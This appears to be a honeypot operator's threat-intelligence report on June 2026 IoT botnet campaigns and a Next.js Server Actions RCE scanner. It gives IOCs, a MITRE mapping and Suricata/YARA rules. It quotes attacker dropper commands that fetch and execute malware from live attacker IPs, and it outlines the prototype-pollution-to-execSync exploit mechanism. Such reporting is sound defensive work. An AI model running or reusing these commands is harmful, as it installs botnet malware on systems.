TLP:CLEAR HIGH cowrAI Honeypot Fleet 2026-06-23
June 2026 IoT Surge & Web RCE Campaign
Three concurrent campaigns observed across 36-box global sensor fleet: Flylegit multi-arch IoT worm with honeypot evasion, Frosty Mirai targeting Realtek infrastructure, and active exploitation of Next.js Server Actions RCE.

Executive Summary

2.7MCommands Logged (7d)
8,202Unique Source IPs
14Flylegit Architectures
0/72Flylegit VT Detections
933Next.js RCE Attempts (14d)
3Active C2 Servers

Between 2026-06-04 and 2026-06-23, cowrAI sensors observed three distinct campaigns operating concurrently. The most significant is the "Flylegit" IoT worm (Telegram: t.me/flylegit), a fully multi-architecture botnet deploying 14-arch binaries from 83.168.110.191 under the guise of a system updater. The malware contains explicit honeypot detection logic that reads /proc/<pid>/comm and exits silently in emulated environments — confirmed by divergent detonation behavior across our sandbox (ARMv7 connected to C2 at port 1336; ARMv5/6 exited cleanly with no contacts). Zero VT detections across all 14 samples as of 2026-06-23.

In parallel, a Next.js Server Actions RCE scanner (103.13.206.12) has been active since 2026-06-09, firing 933 exploit attempts using React Server Components prototype-pollution to gain unauthenticated code execution on vulnerable Node.js web servers. The recovered dropper (repositorylinux.dpdns.org/linux.sh, 24,942 bytes) has no VT coverage.

A third campaign, "Frosty" Mirai (family-confirmed), explicitly targets Realtek-based embedded devices from 109.104.153.60. Sandbox detonation confirmed live C2 at 103.106.228.23:80 across 14 consecutive runs spanning 7 days.

Campaign 1 — Flylegit IoT Worm (t.me/flylegit)

Threat Profile
83.168.110.191 · First seen 2026-06-04

Type: Multi-architecture Linux worm / HTTP scanner
Intent: Botnet recruitment, HTTP brute-force scanning
C2: 83.168.110.191:1336 (distribution server doubles as C2)
Attribution: Telegram channel t.me/flylegit (hardcoded string)
VT coverage: 0 detections across all 14 samples
Alias on disk: updaterros.<arch>

Honeypot Evasion
Active anti-analysis — confirmed by sandbox divergence

The binary reads /proc/<self>/comm and checks for known emulator/sandbox process names. If detected, it exits silently with code 0 — no C2 contact, no network noise.

Hardcoded taunts in string table:

"Looks like you are a honeypot, this tool was made by t.me/flylegit!"

Sandbox evidence: ARMv7l connected to 83.168.110.191:1336, killed at 300s timeout. ARMv5l and ARMv6l exited cleanly — QEMU process name leaked to /proc.

Multi-Architecture Deployment

14 distinct binaries deployed in a single distribution directory, covering embedded Linux, SoC, mobile, and server targets:

ARMv4l ARMv5l ARMv6l ARMv7l AArch64 x86-64 SPARC SH4 PowerPC MIPS MIPSEL m68k i486 ARC

Files named iran.<arch> on the server; renamed to updaterros.<arch> by the loader after download. The naming convention (iran.*) is consistent with prior "flylegit" tooling observed in open-source reporting.

Dropper Sequence (Observed on Fleet)

# Attacker arrives via SSH, runs after login:
curl -s http://83.168.110.191/updaterros.armv7l | sh && echo DONE

# The shell script downloads, stages, and executes:
busybox wget http://83.168.110.191/updaterros.armv7l \
  -O /data/local/tmp/com.adal
chmod 777 /data/local/tmp/com.adal
/data/local/tmp/com.adal
# Connects back to 83.168.110.191:1336

Malware Capabilities (Extracted Strings)

HTTP scanning functionality confirmed — the binary emulates a modern browser session targeting common web admin paths:

# HTTP attack surface
/proc/%s/comm       ← honeypot process check
%s %s HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36...
/wp-admin
/api/v1
/index.html
/about
/products

Malware Inventory (IOC)

SHA-256ArchSizeVTDetonation
3d20d10c…1bbdd86ARMv7l124,6400/72C2 hit 83.168.110.191:1336
41dafa96…e235ed6ARMv5l131,9280/72Exited clean (sandbox detected)
5a4d7866…3d3e14ARMv6l146,5160/72Exited clean (sandbox detected)
9ccaf7ad…9d495AArch64190,4480/72
bdde6169…69cf5x86-6455,9080/72
fc6d6fbc…014fSPARC22,1400/72
c71e597c…746aSH4119,4800/72
79925092…cf5PowerPC137,9160/72
34ec597c…d86MIPSEL185,6520/72
bc38bc40…429MIPS181,5560/72
fa190db0…443m68k162,4560/72
bc1f71da…f25i48679,0200/72
a09d4c56…0faARMv4l135,5440/72
6bb57ac2…a2ARC140,7560/72
DETECTION GAP: Zero antivirus coverage as of 2026-06-23. These hashes will not trigger signature-based endpoint or network security controls. Behavioral detection (process reads /proc/self/comm at startup, then connects to single IP:port) is the reliable signal.

Campaign 2 — Next.js Server Actions RCE (repositorylinux.dpdns.org)

Threat Profile
103.13.206.12 · Active since 2026-06-09

Type: Web application exploitation scanner
Target: Next.js applications with Server Actions enabled
Dropper: repositorylinux.dpdns.org/linux.sh (24,942 bytes)
Attack volume: 933 attempts (14 days, single IP)
VT coverage: 0 detections on linux.sh
Exfil method: Output leaked via NEXT_REDIRECT digest URL parameter

Exploit Mechanism
React Server Components prototype pollution → RCE

The attack targets the React Flight protocol's JSON deserializer. By submitting a crafted multipart/form-data payload to any Next.js Server Action endpoint, the attacker triggers __proto__:then prototype chain pollution.

The _response._prefix field is injected with arbitrary JavaScript that executes in the Node.js context via process.mainModule.require('child_process').execSync(). Output is exfiltrated via the redirect URL — a clever technique that avoids any logged HTTP response body.

Full Exploit Payload (Recovered from Fleet)

Key Observations

NOTE: The cowrAI SSH honeypot captured this payload when attackers attempted the exploit against the cowrie SSH shell (the JSON was submitted as a raw shell command). This is a scanning tool that fires blindly against any open port — it does not distinguish between an SSH shell and an HTTP server. Web-facing Next.js servers are the actual target.

Dropper IOC

SHA-256TypeSizeURLVT
cfab101e…9cd5f5Shell script24,942repositorylinux.dpdns.org/linux.sh0/0 (not submitted)

Campaign 3 — Frosty Mirai (Realtek-targeted)

Threat Profile
109.104.153.60 · First seen 2026-06-17

Type: Mirai botnet variant
Target: Realtek-chipset embedded devices
C2: 103.106.228.23:80 (confirmed active, 14 sandbox connections)
Self-rep vector: SSH brute-force + Realtek exploit (realtek.selfrep arg)
Binary alias on disk: zuki
Family: Mirai (confirmed, heuristic match)

Sandbox Telemetry
14 consecutive detonations, 2026-06-17 → 2026-06-23

Frosty.mips (33efcefc…) booted successfully in every detonation. The binary consistently contacts 103.106.228.23:80 and then enters a silent wait loop (c2_silent_bail) — the C2 is up but not issuing commands during our observation windows. This is typical Mirai behavior: bots idle until the operator pushes a DDoS job.

C2: 103.106.228.23:80
Status: ALIVE (14/14 connections confirmed)
Bot behavior: connect → idle → await command

Dropper Sequence

# Observed loader command from 203.193.150.244 relay:
cd /var
rm -rf zuki
wget http://109.104.153.60/bins/frosty.mips -O zuki
chmod 777 zuki
./zuki realtek.selfrep    ← self-replication mode targeting Realtek devices

IOC Table

SHA-256ArchSizeC2VT Family
33efcefc…2fa3MIPS120,488103.106.228.23:80Mirai

Annex — Rebirth Mirai (Huawei/ADB-targeted)

A fourth campaign was observed at lower volume from 176.65.139.48, deploying rebirth.arm7 (SHA-256: 849840d9…b9b5, 199,179 bytes, family: Mirai). Binary contains explicit Huawei home gateway exploit payload (CVE targeting POST /ctrlt/DeviceUpgrade_1 with digest auth) and Steam Source Engine Query bytes (DDoS amplification primitive). Also targets Android ADB (com.supercell.clashroyal masquerade). Sandbox confirmed C2 at 178.16.52.104:18234, :19823, :62849.

SHA-256C2DDoS Vectors
849840d9…39b5178.16.52.104:18234 / :19823 / :62849Huawei exploit, Steam query, ADB

Infrastructure Map

Relay / Recon node
  203.193.150.244  ──── fires 29-cmd sysrecon sequence ────────────────── victim SSH
      │
      ├── wget http://109.104.153.60/bins/frosty.mips → zuki         [Mirai]
      │         └── C2 → 103.106.228.23:80
      │
      ├── curl http://83.168.110.191/updaterros.<arch> | sh         [Flylegit]
      │         └── C2 → 83.168.110.191:1336 (same server)
      │
      ├── wget http://156.226.174.98/bins/sora.<arch> → robben      [Sora, unconfirmed]
      │         └── C2 → unknown (exec exits cleanly, 0 contacts)
      │
      └── wget http://176.65.139.48/rebirth.arm7                     [Rebirth Mirai]
                └── C2 → 178.16.52.104 :18234/:19823/:62849

Web RCE scanner (separate campaign)
  103.13.206.12   ──── RSC prototype pollution form-post ─────────────── Next.js server
                          └── dropper: repositorylinux.dpdns.org/linux.sh

MITRE ATT&CK Mapping

IDTechniqueCampaignEvidence
T1110.001Brute Force: Password GuessingAllcowrie.login.success 709k / 7d
T1059.004Unix ShellAllCommand sequences observed in cowrie.command.input
T1082System Information DiscoveryFlylegit, Sora relayuname, /proc/cpuinfo, ip route, ss -tuln, which yum/apt/pacman/zypper
T1083File and Directory DiscoveryRelay reconls -la /, mount, env, history, ps aux sequences
T1105Ingress Tool TransferAllwget/curl dropper fetches to /tmp, /var, /data/local/tmp
T1496Resource HijackingFrosty, Rebirth, FlylegitMirai bot recruitment for DDoS botnet
T1040Network Sniffing (precursor)RebirthSteam query DDoS amplification, Huawei exploit strings
T1190Exploit Public-Facing ApplicationNext.js RCERSC __proto__:then pollution via Server Actions
T1059.007JavaScriptNext.js RCEprocess.mainModule.require execSync injection
T1497.001Virtualization/Sandbox Evasion: System ChecksFlylegit/proc/self/comm read at startup; silent exit on emulator detection
T1036.004Masquerading: Masquerade Task or ServiceFlylegit, RebirthBinary named updaterros; Rebirth disguised as com.supercell.clashroyal
T1071.001Application Layer Protocol: Web ProtocolsFlylegit C2, Frosty C2, Rebirth C2C2 beacons over HTTP :80 and custom TCP ports

Master IOC List

IP Addresses

IPRoleFirst SeenConfidence
83.168.110.191Flylegit distribution + C2 (:1336)2026-06-04High
109.104.153.60Frosty distribution (/bins/frosty.*)2026-06-17High
103.106.228.23Frosty C2 (:80)2026-06-17High (14 sandbox hits)
156.226.174.98Sora distribution (/bins/sora.*)2026-06-22High
176.65.139.48Rebirth distribution (/rebirth.arm7)2026-06-15High
178.16.52.104Rebirth C2 (:18234,:19823,:62849)2026-06-15High (sandbox confirmed)
203.193.150.244Recon relay / multi-campaign loader2026-06-09High
103.13.206.12Next.js RCE scanner2026-06-09High (933 attempts)

Domains

DomainRoleProtocol
repositorylinux.dpdns.orgNext.js RCE dropper server (linux.sh)HTTPS (self-signed)

File Hashes (SHA-256)

SHA-256FamilyArchOn-disk name
3d20d10c…1bbdd86FlylegitARMv7lupdaterros.armv7l / iran.armv7l
41dafa96…e235ed6FlylegitARMv5lupdaterros.armv5l
5a4d7866…3d3e14FlylegitARMv6lupdaterros.armv6l
9ccaf7ad…9d495FlylegitAArch64iran.aarch64
bdde6169…69cf5Flylegitx86-64iran.x86_64
fc6d6fbc…014fFlylegitSPARCiran.sparc
c71e597c…746aFlylegitSH4iran.sh4
79925092…cf5FlylegitPowerPCiran.powerpc
34ec597c…d86FlylegitMIPSELiran.mipsel
bc38bc40…429FlylegitMIPSiran.mips
fa190db0…443Flylegitm68kiran.m68k
bc1f71da…f25Flylegiti486iran.i486
a09d4c56…0faFlylegitARMv4liran.armv4l
6bb57ac2…a2FlylegitARCiran.arc
33efcefc…2fa3Frosty/MiraiMIPSzuki
849840d9…39b5Rebirth/MiraiARMv7com.supercell.clashroyal
cfab101e…9cd5f5linux.sh dropperShell scriptlinux.sh
06f8f80d…c7eadaSora (unconfirmed)x86robben
bed2dc64…b57aSora (unconfirmed)MIPSrobben
ae353956…af0e8Sora (unconfirmed)x86-64robben
2f25ceeb…1efdSora (unconfirmed)i686robben
2abc33cb…049d2Sora (unconfirmed)ARMv7robben

Detection Signatures

Suricata — Flylegit Distribution Server

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"cowrAI - Flylegit IoT worm download iran.*"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/iran."; classtype:trojan-activity; reference:url,cowrai-intel-reports.pages.dev/june-2026-iot-surge; sid:9100001; rev:1;)
alert tcp $HOME_NET any -> 83.168.110.191 1336 (msg:"cowrAI - Flylegit C2 beacon port 1336"; flow:established,to_server; classtype:command-and-control; reference:url,cowrai-intel-reports.pages.dev/june-2026-iot-surge; sid:9100002; rev:1;)

Suricata — Frosty/Mirai C2

alert tcp $HOME_NET any -> 103.106.228.23 80 (msg:"cowrAI - Frosty Mirai C2 check-in"; flow:established,to_server; classtype:command-and-control; reference:url,cowrai-intel-reports.pages.dev/june-2026-iot-surge; sid:9100003; rev:1;)

Suricata — Next.js RSC Prototype Pollution RCE

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"cowrAI - Next.js RSC __proto__:then RCE attempt"; flow:established,to_server; http.method; content:"POST"; http.request_body; content:"__proto__:then"; content:"execSync"; content:"repositorylinux"; classtype:web-application-attack; reference:url,cowrai-intel-reports.pages.dev/june-2026-iot-surge; sid:9100004; rev:1;)
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"cowrAI - Next.js RSC execSync child_process injection"; flow:established,to_server; http.request_body; content:"process.mainModule"; content:"child_process"; content:"execSync"; content:"NEXT_REDIRECT"; classtype:web-application-attack; sid:9100005; rev:1;)

Yara — Flylegit Honeypot Detection String

rule Flylegit_IoT_Worm_Honeypot_Check {
    meta:
        author = "cowrAI"
        date = "2026-06-23"
        description = "Flylegit multi-arch worm with honeypot detection"
        reference = "https://cowrai-intel-reports.pages.dev/june-2026-iot-surge"
    strings:
        $hp_str = "Looks like you are a honeypot, this tool was made by t.me/flylegit!" ascii
        $tg = "t.me/flylegit" ascii
        $proc = "/proc/%s/comm" ascii
    condition:
        uint32(0) == 0x464C457F and  // ELF magic
        any of them
}

Collection Methodology

All data collected from the cowrAI distributed honeypot fleet: 36 Linux VPS nodes across Cloudzy (Bern/Frankfurt), Vultr, DigitalOcean, Netcup, TeamBlue, and Hetzner. Each node runs cowrie 2.9.17 with the LLM backend (Gemma3:12b) for authentic shell interaction, plus a randomized subset of 9 alt-protocol lure daemons (adbhoney, soaplure, httplure, redislure, llmlure, apachelure, sqllure, vnclure, mlinfralure).

Events ingest in near-real-time to Cloudflare D1 (operational) and PostgreSQL (via Hyperdrive) with Analytics Engine for fleet aggregates. Binaries are captured by the ingest sidecar and stored in R2; classification runs automatically (strings extraction → family heuristics → VirusTotal → tria.ge → Workers AI summary → YARA). Sandbox detonation runs on sandbox-sfo (Ubuntu, QEMU user-mode emulation, WARP egress, 50 Mbit/s qdisc + outbound denylist) with 300-second default runtime and 12-hour dwell option.

Sandbox limitation noted: Flylegit's /proc/self/comm anti-sandbox check detects QEMU user-mode emulation via the process name. ARMv5/6 samples exited without C2 contact; ARMv7 (direct exec path) connected to C2. This is a known gap — QEMU process name masking is not currently implemented.

Timeline

2026-06-04
Flylegit first observed on fleet — iran.armv7l downloaded from 83.168.110.191
2026-06-09
Next.js RCE scanner (103.13.206.12) begins active campaign; linux.sh dropper captured
2026-06-11
Full Flylegit 14-arch suite captured; sandbox detonation confirms C2 83.168.110.191:1336 on ARMv7
2026-06-15
Rebirth Mirai (176.65.139.48) captured; sandbox confirms C2 178.16.52.104 on three ports
2026-06-17
Frosty Mirai (109.104.153.60) captured; continuous C2 contact confirmed to 103.106.228.23:80
2026-06-22
Sora botnet (156.226.174.98) debuts — 11-arch UPX-packed binaries, 0 VT detections, renamed to "robben"
2026-06-23
Report published. VT submissions filed for all Sora samples. All C2s remain active.